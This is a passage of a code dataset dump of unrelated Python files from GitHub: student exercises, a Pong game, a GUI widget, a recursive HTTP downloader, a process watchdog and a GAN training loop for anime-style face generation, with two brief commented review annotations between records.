get_last_five_sales_entries()\n    stock_data = get_average_sales(list_of_last_five_sales)\n    update_worksheet(stock_data, 'stock')\n    return stock_data\n\n\nprint(\"Welcome to Love Sandwiches data automation.\\n\")\nstock_data = main()\n\n\n# Write your code below this comment\ndef get_stock_values(data):\n    stock = SHEET.worksheet(\"stock\")\n    headings = []\n    for ind in range(1, 7):\n        column = stock.col_values(ind)\n        headings.append(column[0])\n    dictionary = dict(zip(headings, data))\n    return dictionary\n\n\nstock_values = get_stock_values(stock_data)\nprint(\"Make the following numbers of sandwiches for next market:\\n\")\nprint(stock_values)\n","repo_name":"loosenthedark/CI_python-essentials_love-sandwiches-walkthrough-project","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"31670929741","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\n\n# Case 1:\n# X has more independent features compared to the single dependent feature y\ndataset = pd.read_csv(\"50_Startups.csv\")\nx = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\nprint(dataset.head())\n\n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabel_encoder = LabelEncoder()\nx[:, 3] = label_encoder.fit_transform(x[:, 3])\n# One-hot encode the string category column\nonehotencoder = OneHotEncoder(categorical_features = [3])\nx = onehotencoder.fit_transform(x).toarray()\n\n# Avoiding the dummy variable trap\nx = x[:, 1:]\n\n# Splitting the data into train and test sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\n\n# Linear regression\nfrom sklearn.linear_model import LinearRegression\nreg = LinearRegression()\nreg.fit(X_train, y_train)\n# Predict the output variable\ny_pred = reg.predict(X_test)\n\nprint(\"Y_test\", y_test)\nprint(\"y_pred\", y_pred)\n# m=len(x)\n# x=x.reshape(m,1)\n# y=y.reshape(m,1)\n'''color=np.random.randint(4)\nreg.fit(x, y)\ny_pred = reg.predict(x)\n\nplt.plot(x,y_pred)\nprint(y_pred)\n#plt.xlabel(i)\nplt.ylabel(\"Profit\")\nplt.title(\" Against Profit\")\nplt.show()\n'''\n# Equation coefficients and intercept\nprint('Coefficient: \\n', reg.coef_)\nprint('Intercept: \\n', reg.intercept_)\n# Ordinary least squares minimises the sum of squared residuals (y - y`)^2\nr2 = reg.score(X_test, y_test)\nprint('R Square Score', r2)\n","repo_name":"akbarbelif/Bridge-Labz-Python-ML","sub_path":"Regression/Multiple Linear Regression/PredictCompanyProfit.py","file_name":"PredictCompanyProfit.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
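# Reviewer sketch (annotation, not a dataset record): the PredictCompanyProfit
# script above calls OneHotEncoder(categorical_features=[3]), a signature that
# was removed in scikit-learn 0.22. A self-contained sketch of the modern
# equivalent for that one encoding step; the toy rows and the 4-column layout
# (column 3 = State) are assumptions for illustration, not data from the record:
import numpy as np
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder

toy_x = np.array([[1.0, 2.0, 3.0, 'New York'],
                  [4.0, 5.0, 6.0, 'California']], dtype=object)
ct = ColumnTransformer(
    [('state', OneHotEncoder(drop='first'), [3])],  # drop='first' avoids the dummy-variable trap
    remainder='passthrough')
encoded = ct.fit_transform(toy_x)  # one-hot state columns first, then the numeric columns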
+{"seq_id":"7367465624","text":"# Maryan Maxwell\n# CSCI 101 - Section D\n# Lab 4 - Timber Regrowth\n# References: N/A\n# Time: 1hr 10mins\n\nyears = int(input(\"YEARS> \"))\nrate = float(input(\"RATE> \"))\nog_acres = float(input(\"ACRES> \"))\n\nacres = og_acres\npercent_forest = 100 * (acres / 20000)\nprint(f\"OUTPUT 0, {acres:.1f}, {percent_forest:.2f}%\")\n\nfor i in range(1, years + 1):\n    forest = acres + ((rate/100) * acres)\n    acres = forest\n    percent_forest = 100 * (forest / 20000)\n    print(f\"OUTPUT {i}, {acres:.1f}, {percent_forest:.2f}%\")\n\nacres = og_acres\n\nyears_elapsed = 0\nwhile acres < 20000:\n    acres = (((rate/100) + 1) * acres)\n    years_elapsed = years_elapsed + 1\n\nprint(f\"OUTPUT {years_elapsed}\")\n","repo_name":"MaxwellEnough/CSCI101102Labs","sub_path":"Lab4-TimberRegrowth.py","file_name":"Lab4-TimberRegrowth.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"35543434749","text":"import time\nfrom turtle import Screen\nfrom score import Score\nfrom centerline import Centerline\n\nfrom ball import Ball\nfrom paddle import Paddle\n\nplayer_1 = Paddle(1)\nplayer_2 = Paddle(-1)\npaddles = [player_1, player_2]\nball = Ball()\nscoreboard = Score()\ncenterline = Centerline()\n\nscreen = Screen()\nscreen.setup(width=640, height=480)\nscreen.bgcolor('black')\nscreen.tracer(0)\nscreen.listen()\nscreen.onkey(fun=player_1.set_north, key='w')\nscreen.onkey(fun=player_1.set_south, key='s')\nscreen.onkey(fun=player_2.set_north, key='i')\nscreen.onkey(fun=player_2.set_south, key='k')\nscreen.onkey(fun=screen.bye, key='y')\n\n\ngame_running = True\nwhile game_running:\n    time.sleep(0.05)\n    screen.update()\n    player_1.move()\n    player_2.move()\n    ball.bounce_paddles(paddles)\n    ball.move()\n\n    bounds = ball.check_horizontal_bounds()\n    if bounds == 1:\n        scoreboard.scorep1 += 1\n    elif bounds == 2:\n        scoreboard.scorep2 += 1\n\n    scoreboard.update_score()\n\n\nscreen.exitonclick()","repo_name":"HGieselmann/HunderedDaysOfPython","sub_path":"day22-Pong/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"279068052","text":"import customtkinter as ctk\nfrom ..settings import *\n\n\nclass SmallLabelButton(ctk.CTkButton):\n    def __init__(self,\n                 master,\n                 fg_color=\"transparent\",\n                 border_spacing=3,\n                 **kwargs):\n        super().__init__(master,\n                         fg_color=fg_color,\n                         hover=False,\n                         border_width=0,\n                         text_color=LABEL_BUTTON_TEXT_COLOR,\n                         border_spacing=border_spacing,\n                         **kwargs)\n\n        self.button_font = ctk.CTkFont(**SMALL_LABEL_FONT)\n        self.configure(font=self.button_font)\n\n        self.bind(\"<Enter>\", lambda event: self.set_hover())\n        self.bind(\"<Leave>\", lambda event: self.unset_hover())\n\n    def set_hover(self):\n        self.button_font.configure(underline=True)\n        self.configure(cursor=\"hand2\")\n\n    def unset_hover(self):\n        self.button_font.configure(underline=False)\n","repo_name":"bilboderbyshire/school-report-writer","sub_path":"scripts/components/small_label_button.py","file_name":"small_label_button.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
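# Reviewer sketch (annotation, not a dataset record): the Timber Regrowth lab
# above grows `acres` by rate% per year, i.e. geometric growth
# acres_n = acres_0 * (1 + rate/100) ** n, so its years-to-20000 while-loop
# can be cross-checked in closed form (20000 mirrors the lab's constant):
import math

def years_to_full(acres, rate, target=20000.0):
    # Smallest integer n with acres * (1 + rate/100) ** n >= target.
    if acres >= target:
        return 0
    return math.ceil(math.log(target / acres) / math.log(1 + rate / 100))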
+{"seq_id":"24858927070","text":"\"\"\"\nRuns simulate_train_loop.py with a wrapper that fixes a bug in the code.\nThis runs the code for as long as there are new files coming in to the dataset, i.e. the process is not hanging.\n\"\"\"\nimport os\n\nimport os\nimport sys\nimport time\nimport subprocess\nfrom simulate_train_loop import SIMULATING_GAMES_FLAG\n\ndef get_time_from_latest_change(folder):\n \"\"\" Return the time in seconds, since the last change to the folder.\"\"\"\n last_changed = os.path.getmtime(folder)\n return time.time() - last_changed\n\ndef kill_process(p):\n while p.poll() is None:\n p.kill()\n time.sleep(1)\n print(\"Process killed.\")\n\nif __name__ == \"__main__\":\n stdout_file = \"simulate_train_loop_stdout.txt\"\n for i in range(10):\n KILLED_PROCESS = False\n print(f\"Starting iteration {i}\")\n py_exe = sys.executable\n # Start the process\n # Write the stdout to a file\n with open(stdout_file,\"a\") as f:\n p = subprocess.Popen([py_exe,os.path.abspath(\"./ModelTraining/simulate_train_loop.py\")], stdout=f, stderr=f)\n # Start monitoring file changes WHEN the process is in simulation stage\n time.sleep(10)\n while SIMULATING_GAMES_FLAG:\n # If there are no changes for 60 seconds, the proces is hanging. Kill it.\n if get_time_from_latest_change(\"./NotRandomDataset_1\") > 60:\n print(\"No changes for 60 seconds. Killing process.\")\n kill_process(p)\n KILLED_PROCESS = True\n break\n time.sleep(10)\n \n \n \n ","repo_name":"ilmari99/MoskaResearch","sub_path":"ModelTraining/simulate_train_loop_bug_wrapper_fix.py","file_name":"simulate_train_loop_bug_wrapper_fix.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1532575935","text":"# https://www.codechef.com/practice\n\n\nT = int(input())\nwhile T:\n A= input()\n A = int(A)\n ten = A*10//100\n hundred = 100 \n if ten > hundred:\n print(ten)\n else:\n print(hundred)\n T=T-1\n","repo_name":"Niyaj-Kumanali/CodeChef-Python","sub_path":"CHEAPFOOD.py","file_name":"CHEAPFOOD.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"72327785856","text":"import urllib.request\nfrom html.parser import HTMLParser\nimport os\n\n\nclass CatchStartTag(HTMLParser):\n def __init__(self, href_callback):\n super().__init__()\n self.href_callback = href_callback\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n self.href_callback(dict(attrs)['href'])\n\n\ndef download_files_in_url(start_url, start_folder):\n todo = []\n\n def add(u, f):\n print(u, f)\n todo.append((u, f))\n\n add(start_url, start_folder)\n while len(todo) > 0:\n url, folder = todo.pop()\n if url.endswith('/'):\n with urllib.request.urlopen(url) as fp:\n html = fp.read().decode('utf8')\n CatchStartTag(lambda h: add(url + h,\n os.path.join(folder, h) if h.endswith('/') else folder)).feed(html)\n else:\n os.makedirs(folder, exist_ok=True)\n filename = os.path.join(folder, url.split('/')[-1])\n if not os.path.exists(filename):\n print('downloading', url, 'to', filename)\n urllib.request.urlretrieve(url, filename)\n\n\nif __name__ == '__main__':\n # download_files_in_url('http://foo.inf.usi.ch:8000/', './temp/download')\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Synthetic Dataset generation\")\n parser.add_argument(\"--url\", type=str, dest=\"url\", required=True, help=\"url to download from\")\n parser.add_argument(\"--folder\", 
type=str, dest=\"folder\", required=True, help=\"folder to download to\")\n args = parser.parse_args()\n download_files_in_url(args.url, args.folder)\n","repo_name":"simonegiacomelli/code2vec-satd-classifier","sub_path":"code2vec-satd/colab/utils/download_http_server.py","file_name":"download_http_server.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24641566835","text":"import os\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\nmatplotlib.use('Agg')\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport torch.nn.functional as F\r\n\r\nfrom utils import common, train_utils\r\nfrom criteria import id_loss, w_norm\r\nfrom configs import data_configs\r\nfrom datasets.images_dataset import ImagesDataset\r\nfrom criteria.lpips.lpips import LPIPS\r\nfrom models.styleAnime import StyleAnime\r\n\r\nfrom training.ranger import Ranger\r\nfrom hm import hm_loss\r\nfrom models.stylegan2.model import Discriminator, Discriminator_light\r\nimport torch.autograd as autograd\r\nfrom models.discriminator_latent import LatentCodesDiscriminator\r\nclass L1Loss(nn.Module):\r\n def __init__(self):\r\n super(L1Loss, self).__init__()\r\n\r\n def __call__(self, in0, in1):\r\n return torch.sum(torch.abs(in0 - in1), dim=1, keepdim=True)\r\n\r\nclass Coach:\r\n\tdef __init__(self, opts):\r\n\t\tself.opts = opts\r\n\r\n\t\tself.global_step = 0\r\n\r\n\t\tself.device = 'cuda:0' # TODO: Allow multiple GPU? currently using CUDA_VISIBLE_DEVICES\r\n\t\tself.opts.device = self.device\r\n\r\n\t\t# Initialize network\r\n\t\tself.net = StyleAnime(self.opts).to(self.device)\r\n\t\tself.dis = Discriminator(size=256).to(self.device)\r\n\t\t#self.dis = Discriminator_light().to(self.device)\r\n\t\tself.dis_latent = LatentCodesDiscriminator(style_dim=512, n_mlp=4).to(self.device)\r\n\t\t# Initialize loss\r\n\t\tif self.opts.lpips_lambda > 0:\r\n\t\t\tself.lpips_loss = LPIPS(net_type='alex').to(self.device).eval()\r\n\t\tif self.opts.id_lambda > 0:\r\n\t\t\tself.id_loss = id_loss.IDLoss().to(self.device).eval()\r\n\t\tif self.opts.w_norm_lambda > 0:\r\n\t\t\tself.w_norm_loss = w_norm.WNormLoss(start_from_latent_avg=self.opts.start_from_latent_avg)\r\n\r\n\t\tif self.opts.hm_lambda > 0:\r\n\t\t\tself.hm_loss = hm_loss.HMLoss(lambda_his_face=opts.lambda_his_face, lambda_his_hair=opts.lambda_his_hair, lambda_his_eye=opts.lambda_his_eye)\r\n\r\n\t\tself.mse_loss = nn.MSELoss().to(self.device).eval()\r\n\r\n\r\n\t\t# Initialize optimizer\r\n\t\tself.optimizer, self.optimizer_d, self.optimizer_latent = self.configure_optimizers()\r\n\r\n\t\t# Initialize dataset\r\n\t\tself.train_dataset, self.test_dataset = self.configure_datasets()\r\n\t\tself.train_dataloader = DataLoader(self.train_dataset,\r\n\t\t\t\t\t\t\t\t\t\t batch_size=self.opts.batch_size,\r\n\t\t\t\t\t\t\t\t\t\t shuffle=True,\r\n\t\t\t\t\t\t\t\t\t\t num_workers=int(self.opts.workers),\r\n\t\t\t\t\t\t\t\t\t\t drop_last=True)\r\n\t\tself.test_dataloader = DataLoader(self.test_dataset,\r\n\t\t\t\t\t\t\t\t\t\t batch_size=self.opts.test_batch_size,\r\n\t\t\t\t\t\t\t\t\t\t shuffle=False,\r\n\t\t\t\t\t\t\t\t\t\t num_workers=int(self.opts.test_workers),\r\n\t\t\t\t\t\t\t\t\t\t drop_last=True)\r\n\r\n\t\t# Initialize logger\r\n\t\tlog_dir = os.path.join(opts.exp_dir, 'logs')\r\n\t\tos.makedirs(log_dir, exist_ok=True)\r\n\t\tself.logger = 
SummaryWriter(log_dir=log_dir)\r\n\r\n\t\t# Initialize checkpoint dir\r\n\t\tself.checkpoint_dir = os.path.join(opts.exp_dir, 'checkpoints')\r\n\t\tos.makedirs(self.checkpoint_dir, exist_ok=True)\r\n\t\tself.best_val_loss = None\r\n\t\tif self.opts.save_interval is None:\r\n\t\t\tself.opts.save_interval = self.opts.max_steps\r\n\r\n\tdef train(self):\r\n\t\tself.net.train()\r\n\t\twhile self.global_step < self.opts.max_steps:\r\n\t\t\tfor batch_idx, batch in enumerate(self.train_dataloader):\r\n\t\t\t\t\r\n\t\t\t\tx_hm, x, y, x_1, y_1 = batch\r\n\t\t\t\tx_hm, x, y, x_1, y_1 = x_hm.to(self.device).float(), x.to(self.device).float(), y.to(self.device).float(), x_1.to(self.device).float(), y_1.to(self.device).float()\r\n\t\t\t\t\r\n\t\t\t\ty_hat, latent = self.net.forward(x,y, return_latents=True)\r\n\t\t\t\ty_hat_1, latent_1 = self.net.forward(x_1, y_1, return_latents=True)\r\n\r\n\r\n\t\t\t\tif self.opts.loss_adv_weight_latent > 0: \r\n\t\t\t\t\tcode_real = self.dis_latent(latent)\r\n\t\t\t\t\tcode_fake = self.dis_latent(latent_1)\r\n\r\n\t\t\t\t\tcode_loss = self.discriminator_latent_loss(code_real, code_fake)\r\n\t\t\t\t\tself.optimizer_latent.zero_grad()\r\n\t\t\t\t\tcode_loss.backward()\r\n\t\t\t\t\tself.optimizer_latent.step()\r\n\r\n\t\t\t\tif self.opts.loss_adv_weight > 0:\r\n\t\t\t\t\ty_real = self.dis(y)\r\n\t\t\t\t\ty_fake = self.dis(y_hat.detach())\r\n\t\t\t\t\ty_fake_1 = self.dis(y_hat_1.detach())\r\n\r\n\t\t\t\t\tloss_real = self.GAN_loss(y_real, real=True)\r\n\t\t\t\t\tloss_fake = self.GAN_loss(y_fake, real=False)\r\n\t\t\t\t\tloss_fake_1 = self.GAN_loss(y_fake_1, real=False)\r\n\t\t\t\t\tloss_gp = self.div_loss_(y, y_hat.detach(), cuda=self.device)\r\n\r\n\t\t\t\t\td_loss = loss_real + loss_fake + 5 * loss_gp + loss_fake_1\r\n\t\t\t\t\t#d_loss = loss_real + loss_fake + 5 * loss_gp + loss_fake_1*self.opts.adv_lambda_two\r\n\t\t\t\t\tself.optimizer_d.zero_grad()\r\n\t\t\t\t\td_loss.backward()\r\n\t\t\t\t\tself.optimizer_d.step()\r\n\t\t\t\t\r\n\r\n\t\t\t\ty_hat, latent = self.net.forward(x,y, return_latents=True)\r\n\t\t\t\ty_hat_1, latent_1 = self.net.forward(x_1, y_1, return_latents=True)\r\n\r\n\t\t\t\tloss, loss_dict, id_logs = self.calc_loss(x_hm, x, y, y_hat, latent, y_hat_1, latent_1)\r\n\r\n\t\t\t\tself.optimizer.zero_grad()\r\n\t\t\t\tloss.backward()\r\n\t\t\t\t#torch.nn.utils.clip_grad_norm_(self.net.encoder.parameters(), 1)\r\n\t\t\t\tself.optimizer.step()\r\n\r\n\t\t\t\t# Logging related\r\n\t\t\t\tif self.global_step % self.opts.image_interval == 0 or (\r\n\t\t\t\t\t\tself.global_step < 1000 and self.global_step % 25 == 0):\r\n\t\t\t\t\tself.parse_and_log_images(id_logs, x, y, y_hat, title='images/train/faces')\r\n\t\t\t\tif self.global_step % self.opts.board_interval == 0:\r\n\t\t\t\t\tself.print_metrics(loss_dict, prefix='train')\r\n\t\t\t\t\tself.log_metrics(loss_dict, prefix='train')\r\n\r\n\t\t\t\t# Validation related\r\n\t\t\t\tval_loss_dict = None\r\n\t\t\t\tif self.global_step % self.opts.val_interval == 0 or self.global_step == self.opts.max_steps:\r\n\t\t\t\t\tval_loss_dict = self.validate()\r\n\t\t\t\t\tif val_loss_dict and (self.best_val_loss is None or val_loss_dict['loss'] < self.best_val_loss):\r\n\t\t\t\t\t\tself.best_val_loss = val_loss_dict['loss']\r\n\t\t\t\t\t\tself.checkpoint_me(val_loss_dict, is_best=True)\r\n\r\n\t\t\t\tif self.global_step % self.opts.save_interval == 0 or self.global_step == self.opts.max_steps:\r\n\t\t\t\t\tif val_loss_dict is not None:\r\n\t\t\t\t\t\tself.checkpoint_me(val_loss_dict, 
is_best=False)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.checkpoint_me(loss_dict, is_best=False)\r\n\r\n\t\t\t\tif self.global_step == self.opts.max_steps:\r\n\t\t\t\t\tprint('OMG, finished training!')\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\t\tself.global_step += 1\r\n\r\n\tdef validate(self):\r\n\t\tself.net.eval()\r\n\t\tagg_loss_dict = []\r\n\t\tfor batch_idx, batch in enumerate(self.test_dataloader):\r\n\t\t\tx_hm, x, y, x_1, y_1 = batch\r\n\r\n\t\t\twith torch.no_grad():\r\n\t\t\t\tx_hm, x, y, x_1, y_1 = x_hm.to(self.device).float(), x.to(self.device).float(), y.to(self.device).float(), x_1.to(self.device).float(), y_1.to(self.device).float()\r\n\t\t\t\ty_hat, latent = self.net.forward(x, y, return_latents=True)\r\n\t\t\t\ty_hat_1, latent_1 = self.net.forward(x_1, y_1, return_latents=True)\r\n\r\n\r\n\t\t\t\tloss, cur_loss_dict, id_logs = self.calc_loss(x_hm, x, y, y_hat, latent, y_hat_1, latent_1)\r\n\t\t\tagg_loss_dict.append(cur_loss_dict)\r\n\r\n\t\t\t# Logging related\r\n\t\t\tself.parse_and_log_images(id_logs, x, y, y_hat,\r\n\t\t\t\t\t\t\t\t\t  title='images/test/faces',\r\n\t\t\t\t\t\t\t\t\t  subscript='{:04d}'.format(batch_idx))\r\n\r\n\t\t\t# For first step just do sanity test on small amount of data\r\n\t\t\tif self.global_step == 0 and batch_idx >= 4:\r\n\t\t\t\tself.net.train()\r\n\t\t\t\treturn None  # Do not log, inaccurate in first batch\r\n\r\n\t\tloss_dict = train_utils.aggregate_loss_dict(agg_loss_dict)\r\n\t\tself.log_metrics(loss_dict, prefix='test')\r\n\t\tself.print_metrics(loss_dict, prefix='test')\r\n\r\n\t\tself.net.train()\r\n\t\treturn loss_dict\r\n\r\n\tdef checkpoint_me(self, loss_dict, is_best):\r\n\t\tsave_name = 'best_model.pt' if is_best else 'iteration_{}.pt'.format(self.global_step)\r\n\t\tsave_dict = self.__get_save_dict()\r\n\t\tcheckpoint_path = os.path.join(self.checkpoint_dir, save_name)\r\n\t\ttorch.save(save_dict, checkpoint_path)\r\n\t\twith open(os.path.join(self.checkpoint_dir, 'timestamp.txt'), 'a') as f:\r\n\t\t\tif is_best:\r\n\t\t\t\tf.write('**Best**: Step - {}, Loss - {:.3f} \\n{}\\n'.format(self.global_step, self.best_val_loss, loss_dict))\r\n\t\t\telse:\r\n\t\t\t\tf.write('Step - {}, \\n{}\\n'.format(self.global_step, loss_dict))\r\n\r\n\tdef configure_optimizers(self):\r\n\t\tparams = list(self.net.encoder.parameters())\r\n\t\tif self.opts.train_decoder:\r\n\t\t\tparams += list(self.net.decoder.parameters())\r\n\t\tif self.opts.optim_name == 'adam':\r\n\t\t\toptimizer = torch.optim.Adam(params, lr=self.opts.learning_rate)\r\n\t\telse:\r\n\t\t\toptimizer = Ranger(params, lr=self.opts.learning_rate)\r\n\t\tparams_d = list(self.dis.parameters())\r\n\t\toptimizer_d = torch.optim.Adam(params_d, lr=self.opts.learning_rate_d)\r\n\r\n\t\tparams_latent = list(self.dis_latent.parameters())\r\n\t\toptimizer_latent = torch.optim.Adam(params_latent, lr=self.opts.learning_rate_d_latent)\r\n\t\treturn optimizer, optimizer_d, optimizer_latent\r\n\r\n\tdef configure_datasets(self):\r\n\t\tif self.opts.dataset_type not in data_configs.DATASETS.keys():\r\n\t\t\traise Exception('{} is not a valid dataset_type'.format(self.opts.dataset_type))\r\n\t\tprint('Loading dataset for {}'.format(self.opts.dataset_type))\r\n\t\tdataset_args = data_configs.DATASETS[self.opts.dataset_type]\r\n\t\ttransforms_dict = dataset_args['transforms'](self.opts).get_transforms()\r\n\t\ttrain_dataset_celeba = ImagesDataset(source_root=dataset_args['train_source_root'],\r\n\t\t                                     target_root=dataset_args['train_target_root'],\r\n\t\t\t\t\t\t\t\t\t\t\t 
face_source_root=dataset_args['face_train_source_root'],\r\n\t\t\t\t\t\t\t\t\t\t\t face_target_root=dataset_args['face_train_target_root'],\r\n\t\t source_transform=transforms_dict['transform_source'],\r\n\t\t target_transform=transforms_dict['transform_gt_train'],\r\n\t\t opts=self.opts)\r\n\t\ttest_dataset_celeba = ImagesDataset(source_root=dataset_args['test_source_root'],\r\n\t\t target_root=dataset_args['test_target_root'],\r\n\t\t\t\t\t\t\t\t\t\t\tface_source_root=dataset_args['face_test_source_root'],\r\n\t\t\t\t\t\t\t\t\t\t\tface_target_root=dataset_args['face_test_target_root'],\r\n\t\t source_transform=transforms_dict['transform_source'],\r\n\t\t target_transform=transforms_dict['transform_test'],\r\n\t\t opts=self.opts)\r\n\t\ttrain_dataset = train_dataset_celeba\r\n\t\ttest_dataset = test_dataset_celeba\r\n\t\tprint(\"Number of training samples: {}\".format(len(train_dataset)))\r\n\t\tprint(\"Number of test samples: {}\".format(len(test_dataset)))\r\n\t\treturn train_dataset, test_dataset\r\n\r\n\tdef calc_loss(self, x_hm, x, y, y_hat, latent, y_hat_1, latent_1):\r\n\t\tloss_dict = {}\r\n\t\tloss = 0.0\r\n\t\tid_logs = None\r\n\t\tif self.opts.id_lambda > 0:\r\n\t\t\tloss_id, sim_improvement, id_logs = self.id_loss(y_hat, y, x)\r\n\t\t\tloss_dict['loss_id'] = float(loss_id)\r\n\t\t\tloss_dict['id_improve'] = float(sim_improvement)\r\n\t\t\tloss = loss_id * self.opts.id_lambda\r\n\t\tif self.opts.l2_lambda > 0:\r\n\t\t\tloss_l2 = F.mse_loss(y_hat, y)\r\n\t\t\tloss_dict['loss_l2'] = float(loss_l2)\r\n\t\t\tloss += loss_l2 * self.opts.l2_lambda\r\n\t\tif self.opts.lpips_lambda > 0:\r\n\t\t\tloss_lpips = self.lpips_loss(y_hat, y)\r\n\t\t\tloss_dict['loss_lpips'] = float(loss_lpips)\r\n\t\t\tloss += loss_lpips * self.opts.lpips_lambda\r\n\t\tif self.opts.lpips_lambda_crop > 0:\r\n\t\t\tloss_lpips_crop = self.lpips_loss(y_hat[:, :, 35:223, 32:220], y[:, :, 35:223, 32:220])\r\n\t\t\tloss_dict['loss_lpips_crop'] = float(loss_lpips_crop)\r\n\t\t\tloss += loss_lpips_crop * self.opts.lpips_lambda_crop\r\n\t\tif self.opts.l2_lambda_crop > 0:\r\n\t\t\tloss_l2_crop = F.mse_loss(y_hat[:, :, 35:223, 32:220], y[:, :, 35:223, 32:220])\r\n\t\t\tloss_dict['loss_l2_crop'] = float(loss_l2_crop)\r\n\t\t\tloss += loss_l2_crop * self.opts.l2_lambda_crop\r\n\t\tif self.opts.w_norm_lambda > 0:\r\n\t\t\tloss_w_norm = self.w_norm_loss(latent, self.net.latent_avg)\r\n\t\t\tloss_dict['loss_w_norm'] = float(loss_w_norm)\r\n\t\t\tloss += loss_w_norm * self.opts.w_norm_lambda\r\n\t\tif self.opts.w_norm_lambda_1 > 0:\r\n\t\t\tloss_w_norm_1 = self.w_norm_loss(latent_1, self.net.latent_avg)\r\n\t\t\tloss_dict['loss_w_norm_1'] = float(loss_w_norm_1)\r\n\t\t\tloss += loss_w_norm_1 * self.opts.w_norm_lambda_1\r\n\t\tif self.opts.hm_lambda > 0:\r\n\t\t\tloss_hm = self.hm_loss(y_hat, y, x_hm, x_hm)\r\n\t\t\tloss_dict['loss_hm'] = float(loss_hm)\r\n\t\t\tloss += loss_hm * self.opts.hm_lambda\r\n\t\tif self.opts.loss_adv_weight > 0:\r\n\t\t\ty_adv = self.dis(y_hat)\r\n\t\t\tloss_adv = self.GAN_loss(y_adv, real=True)\r\n\t\t\tloss_dict['loss_adv'] = float(loss_adv)\r\n\t\t\tloss += loss_adv * self.opts.loss_adv_weight\r\n\t\tif self.opts.loss_adv_weight_latent > 0:\r\n\t\t\ty_adv_latent = self.dis_latent(latent_1)\r\n\t\t\tloss_adv_latent = F.softplus(-y_adv_latent).mean()\r\n\t\t\tloss_dict['loss_adv_latent'] = float(loss_adv_latent)\r\n\t\t\tloss += loss_adv_latent * self.opts.loss_adv_weight_latent\r\n\r\n\t\tloss_dict['loss'] = float(loss)\r\n\t\treturn loss, loss_dict, id_logs\r\n\r\n\tdef log_metrics(self, 
metrics_dict, prefix):\r\n\t\tfor key, value in metrics_dict.items():\r\n\t\t\tself.logger.add_scalar('{}/{}'.format(prefix, key), value, self.global_step)\r\n\r\n\tdef print_metrics(self, metrics_dict, prefix):\r\n\t\tprint('Metrics for {}, step {}'.format(prefix, self.global_step))\r\n\t\tfor key, value in metrics_dict.items():\r\n\t\t\tprint('\\t{} = '.format(key), value)\r\n\r\n\tdef parse_and_log_images(self, id_logs, x, y, y_hat, title, subscript=None, display_count=1):\r\n\t\t\r\n\t\tim_data = []\r\n\t\tfor i in range(display_count):\r\n\t\t\tcur_im_data = {\r\n\t\t\t\t'input_face': common.log_input_image(x[i], self.opts),\r\n\t\t\t\t'target_face': common.tensor2im(y[i]),\r\n\t\t\t\t'output_face': common.tensor2im(y_hat[i]),\r\n\t\t\t}\r\n\t\t\tif id_logs is not None:\r\n\t\t\t\tfor key in id_logs[i]:\r\n\t\t\t\t\tcur_im_data[key] = id_logs[i][key]\r\n\t\t\tim_data.append(cur_im_data)\r\n\t\tself.log_images(title, im_data=im_data, subscript=subscript)\r\n\r\n\tdef log_images(self, name, im_data, subscript=None, log_latest=False):\r\n\t\tfig = common.vis_faces(im_data)\r\n\t\tstep = self.global_step\r\n\t\tif log_latest:\r\n\t\t\tstep = 0\r\n\t\tif subscript:\r\n\t\t\tpath = os.path.join(self.logger.log_dir, name, '{}_{:04d}.jpg'.format(subscript, step))\r\n\t\telse:\r\n\t\t\tpath = os.path.join(self.logger.log_dir, name, '{:04d}.jpg'.format(step))\r\n\t\tos.makedirs(os.path.dirname(path), exist_ok=True)\r\n\t\tfig.savefig(path)\r\n\t\tplt.close(fig)\r\n\r\n\tdef __get_save_dict(self):\r\n\t\tsave_dict = {\r\n\t\t\t'state_dict': self.net.state_dict(),\r\n\t\t\t'opts': vars(self.opts)\r\n\t\t}\r\n\t\t# save the latent avg in state_dict for inference if truncation of w was used during training\r\n\t\tif self.opts.start_from_latent_avg:\r\n\t\t\tsave_dict['latent_avg'] = self.net.latent_avg\r\n\t\treturn save_dict\r\n\t\r\n\tdef GAN_loss(self, scores_out, real=True):\r\n\t\tif real:\r\n\t\t\treturn torch.mean(F.softplus(-scores_out))\r\n\t\telse:\r\n\t\t\treturn torch.mean(F.softplus(scores_out))\r\n\r\n\tdef div_loss_(self, real_x, fake_x, p=2, cuda=False):\r\n # if cuda:\r\n\t\tx_ = real_x.requires_grad_(True)\r\n\t\ty_ = self.dis(x_)\r\n\t\t# cal f'(x)\r\n\t\tgrad = 